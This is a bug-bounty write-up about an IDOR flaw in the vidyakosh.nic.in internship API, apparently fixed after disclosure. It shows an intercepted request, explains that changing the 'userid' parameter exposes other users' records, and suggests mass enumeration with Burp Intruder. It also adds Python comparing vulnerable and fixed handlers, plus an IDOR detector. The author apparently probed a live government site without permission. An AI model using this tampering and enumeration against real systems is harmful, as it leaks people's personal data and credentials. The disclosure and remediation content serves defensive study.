API authentication bypass on National Informatics Centre

Krishnadev P Melevila
Published in InfoSec Write-ups
Apr 2, 2022

Hey Hackers!!! My name is Krishnadev P Melevila. I am a 20-year-old web application penetration tester. For more details, search my name on Google.

Vulnerability: API Authentication Bypass

Impact: Zero Day

Risks: Sensitive data leak chained with IDOR

Priority: P0

Scope: Education details, Phone Number, Encrypted passwords, Tokens, Personal sensitive details

National Informatics Center

First of all, I will tell you how I came across this vulnerability.

As usual, I was surfing through Instagram when I came to know about a summer internship opportunity offered by the National Informatics Centre through the website vidyakosh.nic.in. Without waiting any longer, I jumped in to apply. But after filling out all stages of the application, it showed me a message that it is applicable only to 3rd-year students. As I am a first-year B.Tech. student, I was not eligible to apply.

So I became sad.

But I never decided to step back; instead, I turned on my hacker mode!!!

How I reached this report

I saw the NIC Instagram post for the summer internship and quickly went to apply for it. Unfortunately, the internship was only for 3rd-year B.Tech. students with 60% marks, and I am a 1st-year student. So I was disappointed. But my passion woke me up: I started pentesting this site and reached this vulnerability. This is my second bug at the National Informatics Centre. The first one was an IDOR on the Kerala Civil Supplies website developed by NIC.

Now read the technical report!

Steps to reproduce, from the attacker's point of view

Step 1: While filling in the fourth step of the application form, intercept the request. You will see a request like the one below.

POST /public/internship/userdetails HTTP/1.1
Host: vidyakosh.nic.in
Cookie: pop=1; laravel_cookie_consent=1; nic_lms_session=<REDACTED>; XSRF-TOKEN=<REDACTED>
Content-Length: 56
Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="99", "Google Chrome";v="99"
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
Sec-Ch-Ua-Platform: "Windows"
Origin: https://vidyakosh.nic.in
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://vidyakosh.nic.in/public/internship/internshipstep4
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,ml;q=0.8,hi;q=0.7
Connection: close

userid=13&_token=<REDACTED>

Here you can see a parameter called 'userid'. The endpoint trusts this client-supplied value: if we change it to any value other than '13', we get another user's data, as below.

{"message":[{
  "id":1,
  "fname":"Manish",
  "active":0,
  "email":"<REDACTED>",
  "email_otp":"",
  "mobile":"<REDACTED>",
  "mobile_otp":"",
  "arn_no":"",
  "gender":"1",
  "password":"<REDACTED>",
  "created_on":"2022-04-01 16:32:11",
  "updated_on":"2022-04-01 13:40:38",
  "dob":"0000-00-00",
  "father_name":"",
  "mother_name":"",
  "state_id":0,
  "dist_id":0,
  "adress1":"",
  "adress2":"",
  "pin":0,
  "session":"",
  "s_year":"",
  "statement_purpose":"",
  "photo":"",
  "sign":"",
  "project":"",
  "education_pattern":"",
  "institute_category":0,
  "institute_name":"",
  "institute_adress":"",
  "institute_telephone":"",
  "institute_email":"",
  "bank_ac_no":"",
  "bank_name":"",
  "ifsc_code":"",
  "branch_name":"",
  "test":"",
  "deleted_at":null,
  "remember_token":"<REDACTED>",
  "pursuing_year":"",
  "form_submit_value":0
}]}

Using any automation tool like Burp Intruder, we can fetch the complete user data set, including usernames and passwords.
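To make the fix concrete, here is an added example (mine, not the vidyakosh.nic.in code, and in Python rather than the site's Laravel/PHP) contrasting the reported pattern with a hardened handler: the record to return is chosen by the session, not by the form's userid, and the response is allow-listed so password hashes and remember tokens never leave the server. The user rows, session store and log format are constructed for the example; a small log-check function shows how mismatches between session user and requested userid can be surfaced as an IDOR signal.

```python
# Constructed sample rows standing in for the users table (not real data).
USERS = {
    1: {"id": 1, "fname": "Manish", "email": "manish@example.test",
        "mobile": "9000000001", "password": "$2y$10$<hash>", "remember_token": "<token-1>"},
    13: {"id": 13, "fname": "Krishnadev", "email": "kd@example.test",
         "mobile": "9000000013", "password": "$2y$10$<hash>", "remember_token": "<token-13>"},
}
# Constructed session store: session cookie value -> authenticated user id.
SESSIONS = {"sess-user13": 13, "sess-user1": 1}
# Fields the endpoint may echo back; password hashes and tokens never leave the server.
PUBLIC_FIELDS = ("id", "fname", "email", "mobile")


class Forbidden(Exception):
    """Raised when the caller may not see the requested record."""


def userdetails_vulnerable(session_cookie, form):
    """Mirrors the reported flaw: the caller is authenticated, but the row is
    selected by the client-supplied userid, so any userid returns any user's full row."""
    if session_cookie not in SESSIONS:
        raise Forbidden("not logged in")
    return dict(USERS[int(form["userid"])])


def userdetails_fixed(session_cookie, form):
    """Hardened handler: ownership comes from the session; response is allow-listed."""
    uid = SESSIONS.get(session_cookie)
    if uid is None:
        raise Forbidden("not logged in")
    # A userid in the form is tolerated only if it names the caller's own record.
    if "userid" in form and int(form["userid"]) != uid:
        raise Forbidden(f"session user {uid} requested userid {form['userid']}")
    return {k: USERS[uid][k] for k in PUBLIC_FIELDS}


def idor_suspects(log_lines, threshold=3):
    """Detection helper: sessions whose requested userid differed from their own
    at least `threshold` times. Constructed log format: 'session=<cookie> userid=<n>'."""
    counts = {}
    for line in log_lines:
        fields = dict(part.split("=", 1) for part in line.split())
        uid = SESSIONS.get(fields.get("session"))
        if uid is not None and int(fields.get("userid", uid)) != uid:
            counts[fields["session"]] = counts.get(fields["session"], 0) + 1
    return sorted(s for s, n in counts.items() if n >= threshold)
```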

Reported on: 03/04/2022

Partial fix released on: 03/04/2022

Complete fix released on: 04/04/2022

The senior software engineer who attended to my report deserves a special shout-out, as he is very dedicated. As soon as he received my message, he acted very fast and released the partial fix the same night.

So that's all, guys.

Don't forget to follow me on Medium and other social media. Also, please give your 50 claps for this write-up; that's my inspiration to write more!!

I need your support to write more. Buy me a coffee, please: https://www.buymeacoffee.com/krishnadevpm

My Instagram handle: https://instagram.com/krishnadev_p_melevila

My Twitter handle: https://twitter.com/Krishnadev_P_M

My LinkedIn handle: https://www.linkedin.com/in/krishnadevpmelevila/

My personal website: http://krishnadevpmelevila.com/

Web Application Penetration Tester | Cyber Security Enthusiast | Secured Mahatma Gandhi University, Entri App, Linways, Kerala Public Service Commission & More